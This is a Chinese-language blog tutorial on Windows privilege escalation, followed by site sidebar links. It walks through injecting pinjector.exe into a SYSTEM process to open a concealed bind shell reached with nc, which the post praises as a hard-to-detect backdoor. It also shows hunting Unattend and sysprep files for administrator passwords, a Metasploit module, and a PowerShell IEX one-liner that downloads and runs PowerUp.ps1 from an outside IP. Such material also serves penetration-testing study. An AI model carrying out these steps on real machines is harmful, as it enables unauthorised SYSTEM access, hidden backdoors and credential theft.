进程注入提权

使用 pinjector.exe 注入到system用户的进程中，使该进程绑定在0.0.0.0:port ，并建立监听端口，攻击者从攻击机上主动连接该地址，获取到系统的system权限
注入进程提权相当于开启了一个后门，隐蔽性极高，不会创建新的进程，很难发现

下载pinjector.exe

https://www.tarasco.org/security/Process_Injector/index.html

上传 pinjector.exe到靶机可执行目录

##列取所有进程
pinjector.exe -l

在这里插入图片描述

##选择一个system权限运行的进程，对此pid进程执行注入，并建立侦听端口
pinjector.exe -p <pid> cmd <port>

在这里插入图片描述

##使用 nc 连接目标服务器端口
nc -nv 192.168.0.117 5555

连接成功，获取到system权限的shell
在这里插入图片描述

Unattended Installs提权

通常大型组织在部署某些员工较多或时间紧缺的程序时，会使用Unattended Installs自动安装，这种方式允许程序在不需要管理员的操作下进行自动安装，这种方式在部署程序前期较有用，但它也会在系统中残留一个名为Unattend的XML文件，这个XML 件包含所有在安装程序过程中的配置，包括一些本地用户的配置，以及管理员账户等。

Unattend.xml 文件通常在以下文件夹中

C:\sysprep.inf

C:\syspreg\sysprep.xml

C:\Windows\system32\sysprep.inf

C:\windows\system32\sysprep\sysprep.xml

C:\unattend.xml

C:\Windows\Panther\Unattend.xml

C:\Windows\Panther\Unattended.xml

C:\Windows\Panther\Unattend\Unattended.xml

C:\Windows\Panther\Unattend\Unattend.xml

C:\Windows\System32\Sysprep\Unattend.xml

C:\Windows\System32\Sysprep\Panther\Unattend.xml

也可以使用命令全盘搜索Unattend文件

dir /b /s c:\unattend.xml

除此之外，系统中遗留的 sysprep.xml 和sysprep.inf 文件中也可能包含部署系统时使用的凭证信息，可以通过利用这些信息进行提权。

通过搜索 UserAccounts 、Administrators、password 等对凭证进行定位
部分文件内容如下：

<UserAccounts> 
    <LocalAccounts> 
        <LocalAccount> 
            <Password> 
                <Value>UEBzc3dvcmQxMjMhUGFzc3dvcmQ=</Value>                         <PlainText>false</PlainText> 
            </Password> 
            <Description>Local Administrator</Description>                        <DisplayName>Administrator</DisplayName>                             <Group>Administrators</Group> 
            <Name>Administrator</Name> 
        </LocalAccount> 
    </LocalAccounts> 
</UserAccounts>

在以上文件中，可以看到一个本地账户被创建并加入到了管理员组中。
可以猜测密码的值应该是以Base64进行编码的
对密码值进行Base64解码

UEBzc3dvcmQxMjMhUGFzc3dvcmQ=
##解码得到
P@ssword123!Password

通常微软会在编码前的密码后加上password，
所以这里本地管理员的密码实际上是：P@ssword123!

MSF中的利用模块
使用 post/windows/gather/enum_unattend 模块枚举连接的session中的Unattend

msf6 > use post/windows/gather/enum_unattend
msf6 > set session 1
msf6 >exploit

powershell 利用模块搜寻

powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://120.79.66.58/mypowershell/PowerUp.ps1');Get-UnattendedInstallFile"

参考：
https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/
https://www.cnblogs.com/zpchcbd/p/12232683.html

开发工具最新文章

Postman接口测试之Mock快速入门

ASCII码空格替换查表_最全ASCII码对照表0-2

如何使用 ssh 建立 socks 代理

Typora配合PicGo阿里云图床配置

SoapUI、Jmeter、Postman三种接口测试工具的

github用相对路径显示图片_GitHub 中 readm

Windows编译g2o及其g2o viewer

解决jupyter notebook无法连接/ jupyter连接

Git恢复到之前版本

VScode常用快捷键

加:2021-09-13 09:28:08 更:2021-09-13 09:29:17

360图书馆购物三丰科技阅读网日历万年历 2024年11日历

-2024/11/16 5:48:34-

图片自动播放器
↓图片自动播放器↓

TxT小说阅读器
↓语音阅读,小说下载,古典文学↓

一键清除垃圾
↓轻轻一点,清除系统垃圾↓

图片批量下载器
↓批量下载图片,美女图库↓

网站联系: qq:121756557 email:121756557@qq.com IT数码